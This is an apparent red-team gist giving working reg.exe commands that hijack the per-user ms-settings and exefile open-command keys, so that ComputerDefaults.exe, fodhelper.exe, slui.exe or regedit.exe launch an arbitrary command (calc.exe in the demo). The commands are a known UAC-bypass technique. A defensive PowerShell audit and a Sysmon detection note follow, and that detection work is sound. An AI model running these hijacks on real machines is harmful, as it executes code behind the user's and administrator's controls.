@RedTeams
Forked from havoc3-3/lolbin_execution.md
Created April 24, 2025 09:06
# Proxied Execution techniques utilizing registry hijacks

## Proxied Execution using ComputerDefaults.exe via ms-settings Registry Hijacking

### Step 1: Create or modify the registry key

```cmd
reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe" /f

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f
```

### Step 2: Execute ComputerDefaults.exe

This will trigger the execution of calc.exe:

```cmd
C:\Windows\System32\ComputerDefaults.exe
```

### Step 3: Clean up the registry (optional)

```cmd
reg.exe delete HKEY_CURRENT_USER\Software\Classes\ms-settings /f
```

## Proxied Execution using slui.exe, fodhelper.exe, regedit.exe via exefile Registry Hijacking

### Step 1: Create or modify the registry key

```cmd
reg.exe add HKEY_CURRENT_USER\Software\Classes\exefile\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe" /f

reg.exe add HKEY_CURRENT_USER\Software\Classes\exefile\Shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f
```

### Step 2: Execute slui.exe, fodhelper.exe, or regedit.exe

Running any one of these binaries will trigger the execution of calc.exe:

```cmd
C:\Windows\System32\slui.exe

C:\Windows\System32\fodhelper.exe

C:\Windows\System32\regedit.exe
```

### Step 3: Clean up the registry (optional)

```cmd
reg.exe delete HKEY_CURRENT_USER\Software\Classes\exefile /f
```
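Both sections above rely on the same artifact: a `Shell\open\command` key for `ms-settings` or `exefile` planted in a user hive, with an empty `DelegateExecute` value beside it. The legitimate handlers for both classes live only under `HKLM\Software\Classes`, so any per-user copy is worth a look. The following PowerShell audit is an added example written for this page, not code from the gist; it assumes that per-user class registrations are exposed as `HKEY_USERS\<SID>_Classes` (of which `HKCU\Software\Classes` is the current user's view) and that the caller can read those hives.

```powershell
# Added defensive example (not part of the original gist).
# Assumptions: loaded user hives expose their class registrations as
# HKEY_USERS\<SID>_Classes, and the legitimate ms-settings / exefile
# handlers exist only under HKLM\Software\Classes.

function Get-UserClassHijack {
    [CmdletBinding()]
    param(
        # Class names whose Shell\open\command the technique above hijacks.
        [string[]]$ClassName = @('ms-settings', 'exefile')
    )

    # PowerShell only pre-creates HKLM: and HKCU:, so map HKEY_USERS ourselves.
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }

    # One <SID>_Classes subkey per loaded user profile (UsrClass.dat).
    $hives = Get-ChildItem -Path 'HKU:\' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -like '*_Classes' }

    foreach ($hive in $hives) {
        foreach ($class in $ClassName) {
            $keyPath = "$($hive.PSPath)\$class\Shell\open\command"
            if (-not (Test-Path -LiteralPath $keyPath)) { continue }

            $props = Get-ItemProperty -LiteralPath $keyPath

            # The key should not exist in a user hive at all; report it with
            # the command it would run and whether the DelegateExecute value
            # (the fingerprint of this technique) is present.
            [pscustomobject]@{
                Hive            = $hive.PSChildName
                Class           = $class
                Command         = $props.'(default)'
                DelegateExecute = ($props.PSObject.Properties.Name -contains 'DelegateExecute')
                Finding         = 'Per-user Shell\open\command override'
            }
        }
    }
}

# Usage: list every per-user override found on this host.
Get-UserClassHijack | Format-Table -AutoSize
```

Run it from an elevated session so every loaded profile's `_Classes` hive is readable; an empty result means no per-user override of either handler exists. For real-time coverage rather than a point-in-time audit, a Sysmon RegistryEvent (event ID 13) rule matching the same `\Classes\ms-settings\Shell\open\command` and `\Classes\exefile\Shell\open\command` TargetObject paths records the write itself, including the `reg.exe` parent that made it.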
